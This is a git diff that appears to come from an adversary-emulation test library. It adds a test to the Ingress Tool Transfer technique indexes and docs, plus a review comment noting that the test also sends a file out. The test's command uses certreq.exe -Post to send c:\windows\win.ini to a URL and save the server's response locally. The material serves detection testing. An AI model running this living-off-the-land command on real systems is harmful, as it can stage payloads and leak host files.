diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f0f95d4e..80047754 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1243,6 +1243,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
 command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a60044ab..8290c874 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -902,6 +902,7 @@ command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d
 command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3e6cf877..98416706 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -2085,6 +2085,7 @@
 - Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
 - Atomic Test #23: Lolbas replace.exe use to copy file [windows]
 - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
+ - Atomic Test #25: certreq download [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 030d9e4b..aa1cd5a0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1514,6 +1514,7 @@
 - Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
 - Atomic Test #23: Lolbas replace.exe use to copy file [windows]
 - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
+ - Atomic Test #25: certreq download [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 08752eaa..cae2ce81 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -91039,6 +91039,24 @@ command-and-control:
 '
 name: command_prompt
+ - name: certreq download
+ auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
+ description: Use certreq to download a file from the web
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_path:
+ description: Local path to place file
+ type: String
+ default: "%temp%\\Atomic-license.txt"
+ remote_file:
+ description: URL of file to copy
+ type: url
+ default: https://example.com
+ executor:
+ command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
+ cleanup_command: 'del #{local_path} >nul 2>&1'
+ name: command_prompt
 T1001.002:
 technique:
 x_mitre_platforms:
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 3dc9618c..ffac8680 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -56,6 +56,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co
 - [Atomic Test #24 - Lolbas replace.exe use to copy UNC file](#atomic-test-24---lolbas-replaceexe-use-to-copy-unc-file)
+- [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)
+
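Review bot: The `description: Use certreq to download a file from the web` line in the index.yaml hunk understates what the executor does: `certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}` submits the contents of c:\windows\win.ini as the request body to remote_file and writes the server's response to local_path, so the test sends a host file outbound as well as downloading one. A description along the lines of `Use certreq -Post to submit c:\windows\win.ini to a URL and save the HTTP response to a local file (the local file is uploaded as the POST body)` tells a detection engineer that the -Post/-config pair and the outbound request body are the observable, and tells whoever runs the test that data leaves the host. Since index.yaml, the two index files and T1105.md all look generated, the wording presumably has to change in the T1105 source definition (not in this diff) and be regenerated; the same text is repeated in the T1105.md hunk below.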
@@ -1092,4 +1094,42 @@ del %TEMP%\redcanary.cab >nul 2>&1
+
+
+
+## Atomic Test #25 - certreq download
+Use certreq to download a file from the web
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6fdaae87-c05b-42f8-842e-991a74e8376b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_path | Local path to place file | String | %temp%\Atomic-license.txt|
+| remote_file | URL of file to copy | url | https://example.com|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{local_path} >nul 2>&1
+```
+
+
+
+
+